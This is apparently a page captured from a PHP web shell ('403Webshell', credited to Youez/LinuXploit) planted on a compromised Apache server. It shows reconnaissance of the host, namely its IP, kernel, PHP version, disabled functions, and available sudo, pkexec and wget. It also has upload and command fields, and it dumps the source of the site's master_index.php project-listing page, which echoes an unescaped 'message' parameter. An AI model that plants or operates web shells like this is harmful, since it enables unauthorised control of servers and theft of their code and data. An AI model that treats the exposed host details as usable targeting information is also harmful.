403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/onesupportdemo.onesolution.hk/project/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/onesupportdemo.onesolution.hk/project/master_index.php
<?php
require_once(__DIR__ . '/../checkuser.php');
function index() {
	global $dbh, $sqlsrv_dbh;

	$get_keys = array('id', 'customer_id', 'project_name');
	$get = array();
	foreach ($get_keys as $get_key) {
		$$get_key = isset($_GET[$get_key]) ? $_GET[$get_key] : null;
		$get[$get_key] = &$$get_key;
	}

	// Default search
	$tmp_now = new DateTime;
	if (!isset($_GET['start_date']) && empty($start_date) && $_GET["today"]==1) {
		$start_date = Util::date_to_string($tmp_now);
	}
	if (!isset($_GET['end_date']) && empty($end_date) && $_GET["today"]==1) {
		$end_date = Util::date_to_string($tmp_now);
	}
	if (!isset($_GET['staff_id']) && empty($staff_id)) {
		if (!Util::isAdmin()) {
			$staff_id = $_SESSION['webadmin']['id'];
		}

	}else{
		$staff_id = $_GET['staff_id'];
	}

	if (!isset($_GET['status']) && empty($status)) {
		//$status = 1; // Open
	}


	// Show all
	if ($_GET['show_all'] == 1) {
		foreach ($get_keys as $get_key) {
			if (Util::isGuest() && $get_key == 'staff_id') {
				continue;
			}
			$$get_key = null;
		}
	}

	$sql = "
SELECT *
FROM sup_project project
WHERE
	(COALESCE(LENGTH(?), 0) = 0 OR project.id = ?)
	AND (COALESCE(LENGTH(?), 0) = 0 OR project.customer_id = ?)
	AND (COALESCE(LENGTH(?), 0) = 0 OR project.project_name = ?)
ORDER BY project.id ASC
";
	$parameters = array(
		$id, $id,
		$customer_id, $customer_id,
		$project_name, $project_name,
	);


	$pagination = new MySqlPagination($sql, $parameters);
	$sql .= $pagination->getSqlLimitAndOffset();

	if (!($sth = $dbh->prepare($sql))) {
		throw new Exception("sql prepare statement failure: $sql");
	}
	$sth->setFetchMode(PDO::FETCH_ASSOC);
	if (!$sth->execute($parameters)) {
		throw new Exception("sql execute statement failure: $sql");
	}

	$projects = $sth->fetchAll();

	$sql = "SELECT * FROM v_cm_customer_support V_CM_CUSTOMER_SUPPORT ORDER BY company_name";
	if (!($sth = $dbh->prepare($sql))) {
		throw new Exception("sql prepare statement failure: $sql");
	}
	$sth->setFetchMode(PDO::FETCH_ASSOC);
	if (!$sth->execute()) {
		throw new Exception("sql execute statement failure: $sql");
	}
	$customers = $sth->fetchAll();

	$sql = "SELECT * FROM sys_login WHERE deleted = ? ORDER BY username";
	$parameters = array(0);
	if (!($sth = $dbh->prepare($sql))) {
		throw new Exception("sql prepare statement failure: $sql");
	}
	$sth->setFetchMode(PDO::FETCH_ASSOC);
	if (!$sth->execute($parameters)) {
		throw new Exception("sql execute statement failure: $sql");
	}
	$staffs = $sth->fetchAll();

	$tmp_customer_map = array();
	foreach ($customers as &$tmp_customer) {
		$tmp_customer_id = $tmp_customer['cust_id'];
		$tmp_customer_map[$tmp_customer_id] = $tmp_customer;
	}

	$tmp_staff_map = array();
	foreach ($staffs as &$tmp_staff) {
		$tmp_staff_id = $tmp_staff['id'];
		$tmp_staff_map[$tmp_staff_id] = $tmp_staff;
	}

	return array_merge($get, array(
		'projects' => $projects,
		'message' => $_GET['message'],
		'customers' => $customers,
		'staffs' => $staffs,
		'statusOptions' => Job::statusOptions(),
		'pagination' => $pagination->toString(),
	));
}
extract(index());
?><!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

	<?php require(__DIR__ . '/../inc/_head_meta.php'); ?>

	<?php require(__DIR__ . '/../inc/_head_css.php'); ?>

	<style type="text/css">
		body {
			padding-top: 60px; /* 60px to make the container go all the way to the bottom of the topbar */
			padding-bottom: 40px;
		}
	</style>

	<?php require(__DIR__ . '/../inc/_head_script.php'); ?>

</head>
<body>

<?php require(__DIR__ . '/../inc/_navbar.php'); ?>

<div class="container">

	<?php if (isset($message) && !empty($message)): ?>
		<div class="alert alert-info">
			<button type="button" class="close" data-dismiss="alert">&times;</button>
			<h5 class="alert-heading">Note:</h5>
			<p><?=$message?></p>
		</div>
	<?php endif; ?>

	<?php if (Util::isAdmin()): ?>
		<a href="addform.php" class="btn btn-primary pull-right" style="margin-right: 20px;">New Project</a>
	<?php endif; ?>
	<h2>Project</h2>

	<div class="container-fluid">
		<div class="row-fluid">
			<div class="span12">
				<div class="hero-unit" style="padding:10px">
					<a href="#" id="search_btn" class="btn btn-link"><h4><i class="icon-list-alt"></i> Search Form</h4></a>
					<script type="text/javascript">
						$(function() {
							$('#search_btn').click(function(event) {
								event.preventDefault();
								$('#search_form').toggle();
							});
							$('.date-picker').datetimepicker({ pickTime: false });
							$('.time-picker').datetimepicker({ pickDate: false, pickSeconds: false });
							$('.select2').select2();
							$('#search_form').validate();
						});
					</script>
					<form id="search_form" class="form-horizontal" method="get">
						<div class="control-group">
							<?php $attribute = 'id'; $label = 'Project no.'; ?>
							<label class="control-label" for="<?=$attribute?>"><?=$label?></label>
							<div class="controls">
								<input type="text" id="<?=$attribute?>" name="<?=$attribute?>" placeholder="<?=$label?>" class="digits" value="<?=$$attribute?>" />
							</div>
						</div>
						<div class="control-group">
							<?php $attribute = 'customer_id'; $label = 'Customer'; ?>
							<label class="control-label" for="<?=$attribute?>"><?=$label?></label>
							<div class="controls">
								<select id="<?=$attribute?>" name="<?=$attribute?>" placeholder="Select a <?=$label?>" class="select2">
									<option value=""></option>
									<?php foreach ($customers as $customer): ?>
										<option value="<?=$customer['cust_id']?>"<?=$customer['cust_id'] == $$attribute ? ' selected="selected"' : ''?>><?=$customer['enable'] == 1 ? '' : '[Disabled] '?><?=h($customer['company_name'])?></option>
									<?php endforeach; ?>
								</select>
							</div>
						</div>


						<div class="control-group">
							<div class="controls">
								<button type="submit" class="btn btn-primary"><i class="icon-search icon-white"></i> Search</button>
								<a href="master_index.php?show_all=1" class="btn">Show All</a>
							</div>
						</div>
					</form>
				</div>
			</div><!--/span-->
		</div><!--/row-->
	</div>

	<?=$pagination?>

	<table class="table table-striped">
		<caption class="text-left hide"><h2>Project</h2></caption>
		<thead>
		<tr>
			<th>&nbsp;</th>
			<th>Number</th>
			<th>Project Name</th>
			<th>Customer</th>

		</tr>
		</thead>
		<tbody>
		<?php foreach ($projects as $project): ?>
			<tr>
				<td><a href="modifyform.php?id=<?=$project['id']?>" class="btn"><i class="icon-pencil"></i></a></td>
				<td><?=$project['id']?></td>
				<td><?=$project['project_name']?></td>
				<td><?php $customer_detail = Customer::company_name((int)$project['customer_id']); echo $customer_detail[0]["company_name"]?></td>

				<td>
					<?php
						$staff_detail = Staff::staff_name((int)$project['staff_id']); echo $staff_detail[0]["username"];
					?>
				</td>

				<td>
					<i class="<?=in_array($project['status'], array(1, 2)) ? 'icon-ok' : 'icon-remove'?>"></i>
					<?=h($statusOptions[$project['status']])?>
				</td>
			</tr>
		<?php endforeach; ?>
		</tbody>
	</table>

	<?=$pagination?>

	<div class="scroll_to_top">
		<a href="#" class="btn btn-link btn-mini scroll-to-top">Scroll to Top</a>
	</div>

	<script type="text/javascript">
		$(function() {
			$('.job-status, .job-time').tooltip({ html: true });
			$('.scroll-to-top').click(function(event) {
				event.preventDefault();
				scrollToTop();
			});
		});
	</script>

	<?php require(__DIR__ . '/../inc/_footer.php'); ?>

</div> <!-- /container -->
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit